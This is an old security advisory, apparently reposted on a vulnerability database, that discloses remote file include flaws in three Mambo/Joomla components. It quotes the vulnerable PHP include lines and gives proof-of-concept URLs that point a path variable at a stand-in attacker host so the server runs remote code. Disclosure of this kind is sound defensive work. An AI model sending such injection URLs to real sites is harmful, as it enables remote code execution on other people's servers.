Multiple Mambo/Joomla Component Remote File Include Vulnerabilities

2006.07.24
Credit: Ahmad Maulana a.k.a Matdhule
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-3751 | CVE-2006-3750 | CVE-2006-3749
CWE: N/A

ECHO_ADV_38$2006 ----------------------------------------------------------------------------------------------- [ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities ----------------------------------------------------------------------------------------------- Author : Ahmad Maulana a.k.a Matdhule Date : July 12th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote ------------------------------------------------------------------------ Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Hashcash Component Application : com_hashcash Component version : 1.2.1 URL : http://developer.joomla.org/sf/frs/do/viewRelease/projects.com_hashcash/frs.components.com_hashcash # HTMLArea3 addon - ImageManager Application : HTMLArea3 addon - ImageManager Version : 1.5 URL : # Sitemap 2.0.0 for Mambo 4.5.1 CMS Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS Version : Sitemap 2.0.0 URL : http://mamboxchange.com/frs/download.php/6463/sitemap20.zip ------------------------------------------------------------------------ Vulnerability: ~~~~~~~~~~~~~~ # Hashcash Component In folder com_hashcash we found vulnerability script server.php. -----------------------server.php--------------------------------------- <?php include($mosConfig_absolute_path."/administrator/components/com_hashcash/config.hashcash.php"); require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php'); ................... ------------------------------------------------------------------------ # HTMLArea3 addon - ImageManager In folder ImageManager we found vulnerability script config.inc.php. -----------------------config.inc.php----------------------------------- <?php // $Id: config.inc.php, v 1.5 2004/06/03 17:35:27 bpfeifer Exp $ /** * HTMLArea3 addon - ImageManager * Based on Wei Zhuo's ImageManager * <img src="/imgs/at.gif" border=0 align=middle>package Mambo Open Source * <img src="/imgs/at.gif" border=0 align=middle>Copyright 2004 Bernhard Pfeifer aka novocaine * <img src="/imgs/at.gif" border=0 align=middle> All rights reserved * <img src="/imgs/at.gif" border=0 align=middle> Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html * <img src="/imgs/at.gif" border=0 align=middle>version $Revision: 1.5 $ **/ require($mosConfig_absolute_path."/administrator/components/com_htmlarea3_xtd-c/config.htmlarea3_xtd-c.php"); ------------------------------------------------------------------------ # Sitemap 2.0.0 for Mambo 4.5.1 CMS In folder com_sitemap we found vulnerability script sitemap.xml.php. -----------------------sitemap.xml.php---------------------- <?php /** * XML/XHTML menu system * <img src="/imgs/at.gif" border=0 align=middle>package Mambo_4.5.1 * <img src="/imgs/at.gif" border=0 align=middle>copyright (C) 2000 - 2004 Miro International Pty Ltd * <img src="/imgs/at.gif" border=0 align=middle>license http://www.gnu.org/copyleft/gpl.html GNU/GPL * Mambo is Free Software * Author : Johan Janssens - johan<img src="/imgs/at.gif" border=0 align=middle>jinx.be (http://www.jinx.be) **/ // XML library require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' ); ------------------------------------------------------------ Variables $mosConfig_absolute_path are not properly sanitized. When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. Proof Of Concept: ~~~~~~~~~~~~~~~ http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolute_path=http://attacker.com/evil.txt? http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt? Solution: ~~~~~~~ sanitize variabel $mosConfig_absolute_path. ------------------------------------------------------------------------ --- Shoutz: ~~~~~ ~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :) ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama ~ newbie_hacker<img src="/imgs/at.gif" border=0 align=middle>yahoogroups.com, jasakom_perjuangan<img src="/imgs/at.gif" border=0 align=middle>yahoogroups.com ~ #mardongan #jambihackerlink #e-c-h-o <img src="/imgs/at.gif" border=0 align=middle>irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~ matdhule[at]gmail[dot]com -------------------------------- [ EOF ]----------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top